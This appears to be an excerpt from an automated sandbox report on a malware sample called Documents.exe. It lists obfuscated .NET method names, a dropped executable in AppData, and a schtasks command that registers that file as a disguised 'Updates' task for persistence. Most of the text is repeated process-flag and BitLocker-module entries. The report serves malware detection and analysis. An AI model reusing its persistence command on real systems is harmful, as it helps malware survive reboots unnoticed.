                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, Ygr0TnyR1LkSW9E0Em.csHigh entropy of concatenated method names: 'MEtSswHPND', 'nibSOtogde', 'zwrSqL3H3j', 'P34SiASpjZ', 'iM1SFnEFDi', 'Jc1qEFYBes', 'VpBqGD7KMC', 'OZ9qohy0MZ', 'RD6qVW6nYr', 'r2YqXlK5lP'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, nXi6WDpjLanAGQf496.csHigh entropy of concatenated method names: 'sV8WiANgde', 'QH9WFyusRx', 'aHQWfKmNjV', 'IHiWNTPITE', 'uhPWxUPegr', 'pTnW0R1LkS', 'htdBVGwISXW748njUm', 'PuFWmCKFectgBIUybO', 'wXcWWl6IiG', 'mjiW6Ogvcn'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, BSa6rSCOgMEo3mQXEh.csHigh entropy of concatenated method names: 'GvcHb8qnr', 'RGTJkIxqY', 'dO9jIqEnd', 'nMHdYyWwk', 'SRnuSfgAi', 'TofvyiYs6', 'aMYAI0lWhGbmfUFaXb', 'lMwdKs9ybppj3IOpql', 'lK7YNqDub', 'hvWcZgiJo'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, RGS22NmfvosZB4XiiT.csHigh entropy of concatenated method names: 'TBoiD6swb5', 'fg6ia5bLld', 'ALHiH7T52x', 'd96iJqAPgP', 'Tlui3GTRlW', 'zwvijTsFCN', 'YxXidnBonM', 'IfSiArUt1V', 'f96iumDplg', 'qX4ivNWXL6'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, aDUZU1eKdyWMPTRpWG.csHigh entropy of concatenated method names: 'Wljcnfqkja', 'sX2cq1AvY3', 'FogcS286xL', 'EpAcibLPtr', 'YeFclcqFn5', 'H6OcFbYvEw', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, iavCtQFueCRVgf9V4b.csHigh entropy of concatenated method names: 'Chp6suQRvx', 'Giy6Ufsr0i', 'Ndr6O8oaxA', 'Wg36nKnAOm', 'xua6q5KWgy', 'KG26SNFvnK', 'jN56iGN4VO', 'uyf6FPDY7W', 'K1f65jOhlM', 'vhN6fB8aFb'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, AIFAptGR9eg5muxjTc.csHigh entropy of concatenated method names: 'FqZ1VVD05h', 'FiJ1eDeV12', 'TwQYQOLHOI', 'SylYWqlulI', 'SA218IdUmA', 'Gt91P3b74n', 'XoF1kATh1H', 'oL91LtYMHp', 'kK11hrvgll', 'Obb1I2OD4v'
                    Source: C:\Users\user\Desktop\Documents.exeFile created: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
